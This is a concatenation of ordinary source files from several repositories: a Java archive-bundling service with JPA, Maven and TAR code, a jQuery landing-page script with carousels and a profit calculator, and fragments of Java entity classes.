*/ public static EntryPathFactory getFactorySingleton(Properties props) { if (factory == null) { factory = new EntryPathFactory(props); } return factory; } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/services/JobService.java package mil.nga.bundler.services; import java.io.Closeable; import java.util.ArrayList; import java.util.List; import javax.persistence.EntityManager; import javax.persistence.EntityManagerFactory; import javax.persistence.NoResultException; import javax.persistence.Persistence; import javax.persistence.Query; import javax.persistence.criteria.CriteriaBuilder; import javax.persistence.criteria.CriteriaQuery; import javax.persistence.criteria.Root; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.model.Job; import mil.nga.bundler.exceptions.ServiceUnavailableException; /** * Non-EJB implementation of the JobService class. This class implements * the JPA interface for the <code>JOBS</code> table in the back-end data * store. * * @author <NAME> */ public class JobService implements BundlerConstantsI, Closeable { /** * Set up the Log4j system for use throughout the class */ private static final Logger LOGGER = LoggerFactory.getLogger( JobService.class); /** * EntityManager object used throughout the class. */ private EntityManager em; /** * Default constructor. */ public JobService() { } /** * Accessor method for the EntityManager object that will be used to * interact with the backing data store. * * @return A constructed EntityManager object. * @throws ServiceUnavailableException Thrown if we are unable to * construct the EntityManager. 
*/ private EntityManager getEntityManager() throws ServiceUnavailableException { if (em == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Creating un-managed EntityManager."); } EntityManagerFactory emFactory = Persistence.createEntityManagerFactory( UNMANAGED_APPLICATION_PERSISTENCE_CONTEXT); if (emFactory != null) { em = emFactory.createEntityManager(); } else { LOGGER.warn("The EntityManagerFactory object is null. Unable " + "to start the JPA subsystem."); } if (em == null) { throw new ServiceUnavailableException( "Unable to start the JPA subsystem. Unable to " + "construct the EntityManager."); } } return em; } /** * Retrieve a Job object from the target database. * * @param jobID The job ID (primary key) of the job to retrieve. * @return The target Job object. Null if the Job could not be found. */ public Job getJob(String jobID) throws ServiceUnavailableException { Job job = null; if ((jobID != null) && (!jobID.isEmpty())) { try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> root = cq.from(Job.class); // Add the "where" clause cq.where( cb.equal( root.get("jobID"), cb.parameter(String.class, "jobID"))); // Create the query Query query = getEntityManager().createQuery(cq); // Set the value for the where clause query.setParameter("jobID", jobID); // Retrieve the data job = (Job)query.getSingleResult(); } catch (NoResultException nre) { LOGGER.warn("Unable to find Job associated with job ID [ " + jobID + " ]. Returned Job will be null."); } } else { LOGGER.warn("The input job ID is null or empty. Unable to " + "retrieve an associated job."); } return job; } /** * Get a list of all jobIDs currently residing in the target data store. 
* * @return A list of jobIDs */ @SuppressWarnings("unchecked") public List<String> getJobIDs() throws ServiceUnavailableException { List<String> jobIDs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> e = cq.from(Job.class); cq.select(e.get("jobID")); Query query = getEntityManager().createQuery(cq); jobIDs = query.getResultList(); } catch (NoResultException nre) { LOGGER.warn("Unable to find any job IDs in the data store. " + "Returned list will be empty."); jobIDs = new ArrayList<String>(); } return jobIDs; } /** * Update the data in the back end database with the current contents * of the Job. * * @param job The Job object to update. * @return The container managed Job object. */ public Job update(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); Job managedJob = null; if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning update of job [ " + job.getJobID() + " ]..."); } getEntityManager().getTransaction().begin(); managedJob = getEntityManager().merge(job); getEntityManager().getTransaction().commit(); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job updated in [ " + (System.currentTimeMillis() - start) + " ] ms."); } } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } return managedJob; } /** * Persist the input Job object into the back-end data store. * * @param job The Job object to persist. 
*/ public void persist(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning persist of job [ " + job.getJobID() + " ]..."); } getEntityManager().getTransaction().begin(); getEntityManager().persist(job); getEntityManager().getTransaction().commit(); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job persisted in [ " + (System.currentTimeMillis() - start) + " ] ms."); } } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } } /** * Implementation of the <code>close()</code> method required by the * <code>Closeable</code> interface used to close the constructed * <code>EntityManager</code> object. */ @Override public void close() { if (em != null) { em.close(); } } } <file_sep>/parent/pom.xml <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>mil.nga.EnterpriseBundler</groupId> <artifactId>parent</artifactId> <version>1.0.0</version> <packaging>pom</packaging> <name>Enterprise Bundler</name> <url>http://maven.apache.org</url> <developers> <developer> <id>carpenlc</id> <name><NAME></name> <email><EMAIL></email> </developer> </developers> <modules> <module>BundlerCommon</module> <module>BundlerEJB</module> <module>BundlerWeb</module> <module>Bundler</module> </modules> <properties> <application.version>1.0.0</application.version> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <jdk.version>1.8</jdk.version> <javaee.version>7.0</javaee.version> <primefaces.version>6.0</primefaces.version> <jackson.version>2.9.8</jackson.version> <logback.version>1.2.2</logback.version> <slf4j.version>1.7.25</slf4j.version> <httpcore.version>4.4.6</httpcore.version> <httpclient.version>4.5.3</httpclient.version> 
<guava.version>19.0</guava.version> <tika.version>1.20</tika.version> <s3fs.version>1.5.3</s3fs.version> <aws.sdk.version>1.11.128</aws.sdk.version> <c3p0.version>0.9.1.2</c3p0.version> <hibernate-c3p0.version>4.2.20.Final</hibernate-c3p0.version> <oracle.jdbc.version>12.1.0.2.0</oracle.jdbc.version> <commons.codec.version>1.10</commons.codec.version> <commons.compress.version>1.14</commons.compress.version> <maven.compiler.source>1.8</maven.compiler.source> <maven.compiler.target>1.8</maven.compiler.target> <maven-jar-plugin.version>2.4</maven-jar-plugin.version> <maven-ear-plugin.version>2.10</maven-ear-plugin.version> <maven-ejb-plugin.version>2.3</maven-ejb-plugin.version> <maven-dependency-plugin.version>2.4</maven-dependency-plugin.version> <maven-javadoc-plugin.version>2.10.4</maven-javadoc-plugin.version> <maven-wildfly-plugin.version>1.2.0.Alpha4</maven-wildfly-plugin.version> <junit.version>4.12</junit.version> </properties> <dependencyManagement> <dependencies> <dependency> <groupId>javax</groupId> <artifactId>javaee-api</artifactId> <version>${javaee.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.amazonaws</groupId> <artifactId>aws-java-sdk</artifactId> <version>${aws.sdk.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-core</artifactId> <version>${logback.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-classic</artifactId> <version>${logback.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-access</artifactId> <version>${logback.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-api</artifactId> <version>${slf4j.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.httpcomponents</groupId> 
<artifactId>httpcore</artifactId> <version>${httpcore.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.httpcomponents</groupId> <artifactId>httpclient</artifactId> <version>${httpclient.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-core</artifactId> <version>${jackson.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-annotations</artifactId> <version>${jackson.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-databind</artifactId> <version>${jackson.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>commons-codec</groupId> <artifactId>commons-codec</artifactId> <version>${commons.codec.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-compress</artifactId> <version>${commons.compress.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.upplication</groupId> <artifactId>s3fs</artifactId> <version>${s3fs.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.google.guava</groupId> <artifactId>guava</artifactId> <version>${guava.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.tika</groupId> <artifactId>tika-core</artifactId> <version>${tika.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>${junit.version}</version> <scope>test</scope> </dependency> </dependencies> </dependencyManagement> <build> <pluginManagement> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-install-plugin</artifactId> <version>2.5.1</version> <executions> <execution> 
<id>install-commons-compress-lib</id> <inherited>false</inherited> <goals> <goal>install-file</goal> </goals> <phase>validate</phase> <configuration> <groupId>org.apache.commons</groupId> <artifactId>commons-compress</artifactId> <version>${commons.compress.version}</version> <packaging>jar</packaging> <file>${basedir}/lib/commons-compress-1.14.jar</file> <generatePom>true</generatePom> </configuration> </execution> <execution> <id>install-s3fs-lib</id> <inherited>false</inherited> <goals> <goal>install-file</goal> </goals> <phase>validate</phase> <configuration> <groupId>com.upplication</groupId> <artifactId>s3fs</artifactId> <version>${s3fs.version}</version> <packaging>jar</packaging> <file>${basedir}/lib/s3fs-1.5.3.jar</file> <generatePom>true</generatePom> </configuration> </execution> </executions> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-javadoc-plugin</artifactId> <version>${maven-javadoc-plugin.version}</version> <configuration> <show>private</show> </configuration> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-ejb-plugin</artifactId> <version>${maven-ejb-plugin.version}</version> </plugin> <plugin> <groupId>org.wildfly.plugins</groupId> <artifactId>wildfly-maven-plugin</artifactId> <version>${maven-wildfly-plugin.version}</version> <configuration> <skip>true</skip> </configuration> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-ear-plugin</artifactId> <version>${maven-ear-plugin.version}</version> <configuration> <fileNameMapping>no-version</fileNameMapping> <version>7</version> <defaultLibBundleDir>lib</defaultLibBundleDir> <skinnywars>true</skinnywars> <libraryDirectoryMode>NONE</libraryDirectoryMode> </configuration> </plugin> </plugins> </pluginManagement> </build> </project> <file_sep>/README.md # EnterpriseBundler Repository containing the source code associated with an application designed to read/write product data that resides on any file 
system that has a Java NIO2 file system implementation. It was specifically designed for use with a local file system and an AWS S3 file system. ## Pre-requisites * Java (1.8 or higher) * git (v1.7 or higher) * Maven (v3.3.8 or higher) ## Includes * Modified version of Apache Commons Compress v1.14 * Modified to change all file access to utilize the Java 7 NIO 2 stream libraries. (Fork not yet uploaded to GIT) * Modified JAR file is at ~/src/main/resources/commons-compress-1.14.jar * Modified version of Amazon-S3-Filesystem-NIO2 v1.5.3 * Modified to handle authentication via IAM roles. * Modified JAR file is at ~/src/main/resources/s3fs-1.5.3.jar * Fork of original project containing modified source is available at: https://github.com/carpenlc/Amazon-S3-FileSystem-NIO2.git ## Download the Source and Build the EAR File * Download source ``` # cd /var/local/src # git clone https://github.com/carpenlc/EnterpriseBundler.git ``` * Execute the Maven targets to build the output EAR ``` # cd /var/local/src/EnterpriseBundler/parent # mvn clean package ``` * The deployable EAR file will reside at the following location ``` # /var/local/src/EnterpriseBundler/parent/Bundler/target/bundler.ear ``` ## Customizations The Hibernate/JPA persistence.xml should be modified to identify the container-managed datasource. 
The persistence.xml can be found at the following location: ``` # /var/local/src/EnterpriseBundler/parent/BundlerCommon/src/main/resources/META-INF/persistence.xml ``` This application properties file containing the filesystem and AWS-related settings can be found at: ``` # /var/local/src/EnterpriseBundler/parent/Bundler/src/main/application/lib/config.jar/bundler.properties ``` <file_sep>/parent/BundlerCommon/src/test/java/mil/nga/bundler/archive/TarArchiverTest.java package mil.nga.bundler.archive; import static org.junit.Assert.assertTrue; import java.io.File; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.List; import mil.nga.bundler.ArchiveElementFactory; import mil.nga.bundler.archive.ArchiveFactory; import mil.nga.bundler.types.ArchiveType; import mil.nga.bundler.interfaces.BundlerI; import mil.nga.bundler.model.ArchiveElement; import mil.nga.bundler.exceptions.ArchiveException; import mil.nga.bundler.exceptions.UnknownArchiveTypeException; import org.junit.Test; public class TarArchiverTest extends ArchiveTest { public String _archiveFilename1 = "tar_archive_1"; public String _archiveFilename2 = "tar_archive_2"; /** * This method tests that the TAR archiver can archive a directory * and all files contained within, maintaining directory integrity. * * @throws IOException Exception thrown if there are problems writing * the output archive file. Exceptions will fail the test. * @throws ArchiveException Exception thrown if there are problems * validating input data. Exceptions will fail the test. 
*/ @Test public void testBundler1() throws ArchiveException, IOException { // Build the path to the output file StringBuilder sb = new StringBuilder(); sb.append(ArchiveTest._tempDir); sb.append(File.separator); sb.append(this._archiveFilename1); this._archiveFilename1 = sb.toString(); ArchiveFactory factory = ArchiveFactory.getInstance(); try { ArchiveElementFactory archiveEF = new ArchiveElementFactory(awsProps); List<ArchiveElement> elems = archiveEF.getArchiveElements(ArchiveTest._dirToArchive, "/replace"); BundlerI bundler = factory.getBundler(ArchiveType.TAR); System.out.println(this._archiveFilename1); Path p = Paths.get(this._archiveFilename1); bundler.bundle(elems, p.toUri()); System.out.println(p.toString()); String outputFile = p.toString() + "." + ArchiveType.TAR.getText(); Path p2 = Paths.get(outputFile); assertTrue(Files.exists(p2)); double bytes = Files.size(p2); System.out.println("File size [ " + bytes + " ]."); } catch (UnknownArchiveTypeException uae) { // We *should* never get this exception uae.printStackTrace(); } } /** * Test the archive functionality that accepts a list of files as input. * * @throws IOException Exception thrown if there are problems writing * the output archive file. Exceptions will fail the test. * @throws ArchiveException Exception thrown if there are problems * validating input data. Exceptions will fail the test. 
*/ @Test public void testBundler2() throws ArchiveException, IOException { // Build the path to the output file StringBuilder sb = new StringBuilder(); sb.append(ArchiveTest._tempDir); sb.append(File.separator); sb.append(this._archiveFilename2); this._archiveFilename2 = sb.toString(); // Set up the file list List<String> list = super.getFileList(); ArchiveFactory factory = ArchiveFactory.getInstance(); try { ArchiveElementFactory archiveEF = new ArchiveElementFactory(awsProps); List<ArchiveElement> elems = archiveEF.getArchiveElements(list); BundlerI bundler = factory.getBundler(ArchiveType.TAR); System.out.println(this._archiveFilename2); Path p = Paths.get(this._archiveFilename2); bundler.bundle(elems, p.toUri()); System.out.println(p.toString()); String outputFile = p.toString() + "." + ArchiveType.TAR.getText(); Path p2 = Paths.get(outputFile); assertTrue(Files.exists(p2)); double bytes = Files.size(p2); System.out.println("File size [ " + bytes + " ]."); } catch (UnknownArchiveTypeException uae) { // We *should* never get this exception uae.printStackTrace(); } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/model/ExtendedFileEntry.java package mil.nga.bundler.model; import java.io.Serializable; import mil.nga.bundler.types.ArchiveType; import mil.nga.util.URIUtils; /** * Decorator class for the <code>FileEntry</code> objects that contain * an estimation of the files size after compression by the appropriate * algorithm. * * @author <NAME> */ public class ExtendedFileEntry extends FileEntryDecorator implements Serializable { /** * Eclipse-generated serialVersionUID */ private static final long serialVersionUID = 2772049575476679678L; /** * Estimated compressed size of parent file. */ private final long estimatedCompressedSize; /** * The type of output archive is an important factor in determining the * output compressed size. */ private final ArchiveType type; /** * Constructor enforcing the Builder design pattern. 
* @param builder Builder class implementing type checking. */ public ExtendedFileEntry(ExtendedFileEntryBuilder builder) { super(builder.element); estimatedCompressedSize = builder.estimatedCompressedSize; type = builder.type; } /** * Getter method for the decorated <code>FileEntry</code> object. * @return The type of archive that will be generated. */ @Override public FileEntry getFileEntry() { return super.getFileEntry(); } /** * Getter method for the type of output archive. * @return The type of archive that will be generated. */ public ArchiveType getArchiveType() { return type; } /** * Getter method for the estimated compressed size of the parent file. * @return The estimated compressed size. */ public long getEstimatedCompressedSize() { return estimatedCompressedSize; } /** * Getter method for the path within the output archive in which the * target file will reside. * @return The entry path. */ public String getEntryPath() { return getFileEntry().getEntryPath(); } /** * Getter method for the full path to the target file. * @return The entry path. */ public String getFilePath() { return getFileEntry().getFilePath(); } /** * Getter method for the size of the target file. * @return The size of the target file. */ public long getSize() { return getFileEntry().getSize(); } /** * Construct an ArchiveElement object from the input * parent <code>FileEntry</code> object. * * @return A new ArchiveElement object. */ public ArchiveElement getArchiveElement() { return new ArchiveElement.ArchiveElementBuilder() .entryPath(getFileEntry().getEntryPath()) .size(getFileEntry().getSize()) .uri(URIUtils.getInstance() .getURI(getFileEntry().getFilePath())) .build(); } /** * Class implementing the Builder creation pattern for new * FileEntry objects. 
* * @author <NAME> */ public static class ExtendedFileEntryBuilder { private FileEntry element; private long estimatedCompressedSize = -1; private ArchiveType type; /** * Method used to actually construct the ExtendedFileEntry object. * * @return A constructed and validated ExtendedFileEntry object. */ public ExtendedFileEntry build() throws IllegalStateException { ExtendedFileEntry object = new ExtendedFileEntry(this); validateExtendedFileEntryObject(object); return object; } /** * Setter method for the <code>FileEntry</code> object to decorate. * * @param value The <code>FileEntry</code> object to decorate. * @return Reference to the parent builder object. */ public ExtendedFileEntryBuilder fileEntry(FileEntry value) { element = value; return this; } /** * Setter method for the estimated compressed size of the target file. * * @param value The estimated compressed size of the target file. * @return Reference to the parent builder object. */ public ExtendedFileEntryBuilder estimatedCompressedSize(long value) { estimatedCompressedSize = value; return this; } /** * Setter method for the output archive type. * * @param value The output archive type. * @return Reference to the parent builder object. */ public ExtendedFileEntryBuilder type(ArchiveType value) { type = value; return this; } /** * Validate that all required fields are populated. * * @param object The <code>ExtendedFileEntry</code> object to validate. * @throws IllegalStateException Thrown if any of the required fields * are not populated. 
*/ public void validateExtendedFileEntryObject(ExtendedFileEntry object) throws IllegalStateException { if (object.getArchiveType() == null) { throw new IllegalStateException ("Invalid value for archive " + "type [ null ]."); } if (object.getEstimatedCompressedSize() < 0) { throw new IllegalStateException ("Invalid value for estimated " + "compressed file size [ " + object.getEstimatedCompressedSize() + " ]."); } } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/archive/TarArchiver.java package mil.nga.bundler.archive; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URI; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.nio.file.StandardOpenOption; import java.util.List; import mil.nga.bundler.types.ArchiveType; import mil.nga.bundler.interfaces.BundlerI; import mil.nga.bundler.exceptions.ArchiveException; import mil.nga.bundler.model.ArchiveElement; import org.apache.commons.compress.archivers.ArchiveEntry; import org.apache.commons.compress.archivers.tar.TarArchiveEntry; import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * Concrete class implementing the logic to create an archive file in * TAR format. * * @author <NAME> */ public class TarArchiver extends Archiver implements BundlerI { /** * Set up the Log4j system for use throughout the class */ final static Logger LOGGER = LoggerFactory.getLogger(TarArchiver.class); /** * The archive type handled by this class */ final private ArchiveType type = ArchiveType.TAR; /** * Default constructor */ public TarArchiver( ) { } /** * Required concrete method used to construct the type-appropriate * ArchiveEntry object. * * @param file Reference to the file to be added to the output archive. * @param entryPath The path within the output file where the file will be * placed. * @return The type-appropriate archive entry. 
*/ @Override public ArchiveEntry getArchiveEntry(URI file, String entryPath) throws IOException { return new TarArchiveEntry(file, entryPath); } /** * Getter method for the archive type. * @return The archive type that this concrete class will create. */ @Override public ArchiveType getArchiveType() { return type; } /** * Execute the "bundle" operation to TAR all of the required input files * into a single output Archive. * * @param files List of files to Archive. * @param outputFile The output file in which the input list of files * will be archived. * @throws ArchiveException Thrown if there are errors creating the output * archive file. * @throws IOException Thrown if there are problems accessing any of * the target files. */ @Override public void bundle(List<ArchiveElement> files, URI outputFile) throws ArchiveException, IOException { long startTime = System.currentTimeMillis(); setOutputFile(outputFile); if ((files != null) && (files.size() > 0)) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Creating output archive file [ " + getOutputFile().toString() + " ]."); } // Ensure the target output file does not already exist. Files.deleteIfExists(Paths.get(getOutputFile())); // Construct the output stream to the target archive file. try (TarArchiveOutputStream taos = new TarArchiveOutputStream( new BufferedOutputStream( Files.newOutputStream( Paths.get(getOutputFile()), StandardOpenOption.CREATE, StandardOpenOption.WRITE)))) { for (ArchiveElement element : files) { taos.putArchiveEntry( getArchiveEntry( element.getURI(), element.getEntryPath())); copyOneFile(taos, element.getURI()); notify(element); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Output archive [ " + getOutputFile() + " ] created in [ " + (System.currentTimeMillis() - startTime) + " ] ms."); } } } else { LOGGER.warn("There are no input files to process. Output " + "archive not created."); } } }
09d8a68b89a76fe442884ca40faf1a73be60ab51
[ "Markdown", "Java", "Maven POM" ]
13
Java
carpenlc/EnterpriseBundler
38951c2c4f7efd08459d2d55ce583e15655873b2
536b15a5e2961f4f8f5445ec581af7170b3bfcb9
refs/heads/master
<file_sep>let mix = require('yh-mix'); mix.options({ processCssUrls: false }); mix.setPublicPath('public') .js('resources/js/app.js', 'public/js') .sass('resources/sass/app.scss', 'public/css') .version() .browserSync({ server: { baseDir: ['public'] }, proxy: undefined, files: [ 'public/js/**/*.js', 'public/css/**/*.css', ], }); ;<file_sep># dstokes5 I like this athletic site. <file_sep>window.jQuery = window.$ = require('jquery'); require('popper.js'); require('bootstrap'); require('./slick.js'); require('./magnific-popup.min.js'); require('./jparticles.all.js'); require('./jquery.ripples-min.js'); require('./animated-headline.js'); (function ($) { "use strict"; $(document).ready(function () { /*------------------------------ smooth-scrolling -------------------------------*/ $('#primary-menu li a[href*="#"]') // Remove links that don't actually link to anything .not('[href="#"]') .not('[href="#0"]') .on('click', function(event) { // On-page links if ( location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') && location.hostname == this.hostname ) { // Figure out element to scroll to var target = $(this.hash); target = target.length ? target : $('[name=' + this.hash.slice(1) + ']'); // Does a scroll target exist? if (target.length) { // Only prevent default if animation is actually gonna happen event.preventDefault(); $('html, body').animate({ scrollTop: target.offset().top }, 1000, function() { // Callback after animation // Must change focus! 
var $target = $(target); $target.focus(); if ($target.is(":focus")) { // Checking if the target was focused return false; } else { $target.attr('tabindex','-1'); // Adding tabindex for elements not focusable $target.focus(); // Set focus again }; }); } } }); /*------------------------------ fixed-nav -------------------------------*/ $(window).on('scroll', function () { var scroll = $(window).scrollTop(); if (scroll < 100) { $("#navbar").removeClass("sticky"); } else { $("#navbar").addClass("sticky"); } }); /*------------------------------ calculate -------------------------------*/ $(document).on('change', '.calculator-profit', function (e) { calculateProfit(); }) $(document).on('keyup', '.calculator-invest', function (e) { calculateProfit(); }) $(document).on('change', '.calculator-invest', function (e) { calculateProfit(); }) $('.counter').each(function () { $(this).prop('Counter',0).animate({ Counter: $(this).text() }, { duration: 4000, easing: 'swing', step: function (now) { $(this).text(Math.ceil(now)); } }); }); function calculateProfit() { var invest = $('.calculator-invest').val(); var profit = $('.calculator-profit').val(); if (! isNaN(invest) && ! 
isNaN(profit)) { var calculated = invest*(profit/100); $('.calculator-result-daily').text(calculated); $('.calculator-result-weekly').text(calculated*7); $('.calculator-result-monthly').text(calculated*30); } } /*------------------------------ popup-videos -------------------------------*/ $('.popup-video').magnificPopup({ disableOn: 700, type: 'iframe', mainClass: 'mfp-fade', removalDelay: 160, preloader: false, fixedContentPos: false, }); /*------------------------------ choose-section-carousel -------------------------------*/ $('.choose-section-carousel').slick({ infinite: true, autoplay: true, focusOnSelect: true, speed: 1000, slidesToShow: 5, slidesToScroll: 5, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-right\" aria-hidden='true'></i></button>", dots: true, dotsClass: 'choose-section-dots', customPaging: function (slider, i) { var slideNumber = (i + 1), totalSlides = slider.slideCount; return '<a class="dot" role="button" title="' + slideNumber + ' of ' + totalSlides + '"><span class="string">' + slideNumber + '/' + totalSlides + '</span></a>'; }, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 3, slidesToScroll: 3, infinite: true, dots: true } }, { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 2 } }, { breakpoint: 480, settings: { slidesToShow: 1, slidesToScroll: 1, dots: false } } ] }); /*------------------------------ investment-section-carousel -------------------------------*/ $('.investment-section-carousel').slick({ infinite: true, autoplay: true, focusOnSelect: true, speed: 1000, slidesToShow: 4, slidesToScroll: 4, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i 
class=\"icofont-thin-right\" aria-hidden='true'></i></button>", dots: true, dotsClass: 'investment-section-dots', customPaging: function (slider, i) { var slideNumber = (i + 1), totalSlides = slider.slideCount; return '<a class="dot" role="button" title="' + slideNumber + ' of ' + totalSlides + '"><span class="string">' + slideNumber + '/' + totalSlides + '</span></a>'; }, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 3, slidesToScroll: 3, infinite: true, dots: true } }, { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 2 } }, { breakpoint: 480, settings: { slidesToShow: 1, slidesToScroll: 1, dots:false } } ] }); /*------------------------------ calculate-area -------------------------------*/ $(document).on('change', '.calculator-area-profit', function (e) { calculateAreaProfit(); }) $(document).on('keyup', '.calculator-area-invest', function (e) { calculateAreaProfit(); }) $(document).on('change', '.calculator-area-invest', function (e) { calculateAreaProfit(); }) $('.counter').each(function () { $(this).prop('Counter',0).animate({ Counter: $(this).text() }, { duration: 4000, easing: 'swing', step: function (now) { $(this).text(Math.ceil(now)); } }); }); function calculateAreaProfit() { var invest = $('.calculator-area-invest').val(); var profit = $('.calculator-area-profit').val(); if (! isNaN(invest) && ! 
isNaN(profit)) { var calculated = invest*(profit/100); $('.calculator-result-area-daily').text(calculated); $('.calculator-result-area-weekly').text(calculated*7); $('.calculator-result-area-monthly').text(calculated*30); } } /*------------------------------ testimonial-carousel -------------------------------*/ $('.testimonial-carousel').slick({ infinite: true, autoplay: true, centerMode:true, focusOnSelect: true, speed: 1000, slidesToShow: 2, slidesToScroll: 1, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-double-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-double-right\" aria-hidden='true'></i></button>", responsive: [ { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 1 } }, { breakpoint: 320, settings: { slidesToShow: 1, slidesToScroll: 1, } } ] }); /*------------------------------ home-section-slider -------------------------------*/ $('.home-slider').slick({ infinite: true, autoplay: true, focusOnSelect: true, speed: 300, slidesToShow: 1, slidesToScroll: 1, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-right\" aria-hidden='true'></i></button>", }); /*------------------------------ preloader -------------------------------*/ $("#preloader").delay(300).animate({ "opacity" : "0" }, 500, function() { $("#preloader").css("display","none"); }); /*------------------------------ JParticles -------------------------------*/ function bind(id, run) { var effect = run(); } bind('#particles', function () { return new JParticles.particle('#particles .particles', { num: 100 }); }); /*------------------------------ ripple -------------------------------*/ $('.ripple-container').ripples({ resolution: 512, dropRadius: 20, perturbance: 0.04 }); }) 
})(jQuery);
d76b3a76a4c757b1be6aa916a99a2336bc46521c
[ "JavaScript", "Markdown" ]
3
JavaScript
dstokes5/dstokes5
02461d4a894949f314d6e785e20bbe5015f69c36
5358a811ff532334b2aa2f7e61642aa46dd8c2a0
refs/heads/master
<file_sep>package com.ebupt.service; import java.util.ArrayList; import com.ebupt.entity.ConfReportMetadata; import com.ebupt.entity.TReportInfo; public interface TestService { ArrayList<ConfReportMetadata> testDatabase(); } <file_sep>package com.ebupt.entity; import java.io.Serializable; import java.util.ArrayList; import java.util.List; import lombok.Data; @Data public class TReportDirectory implements Serializable{ private static final long serialVersionUID = -51188552803144046L; private String dirId; private String parentId; private String dirname; private String isFinal; private String dirLevel; private String reportId; private String position; private List<TReportInfo>tReportInfosList=new ArrayList<TReportInfo>();; private List<TReportDirectory>tReportDirectorysList; } <file_sep>package com.ebupt.entity; import java.util.List; import lombok.Data; @Data public class WebSysNavigatorBis { /** * 资源/菜单/目录id */ private String id; /** * 父id */ private String parentId; /** * 菜单名字 */ private String name; /** * 图标路径 */ private String icon; /** * 关联连接 */ private String url; /** * 提示信息 */ private String tip; /** * 0:非叶子节点 1:叶子节点 */ private String type; /** * 展示位置排序 */ private String position; /** * 储存它的子菜单 */ private List<WebSysNavigatorBis> childrenWebSysNavigatorBis; //以下非数据库字段 /** * 页面访问次数 */ private String PV; /** * 访问人数 */ private String UV; } <file_sep>package com.ebupt.service.impl; import java.io.FileOutputStream; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.stream.Collectors; import org.apache.poi.hssf.usermodel.HSSFCell; import org.apache.poi.hssf.usermodel.HSSFCellStyle; import org.apache.poi.hssf.usermodel.HSSFFont; import org.apache.poi.hssf.usermodel.HSSFPalette; import org.apache.poi.hssf.usermodel.HSSFRow; import org.apache.poi.hssf.usermodel.HSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import 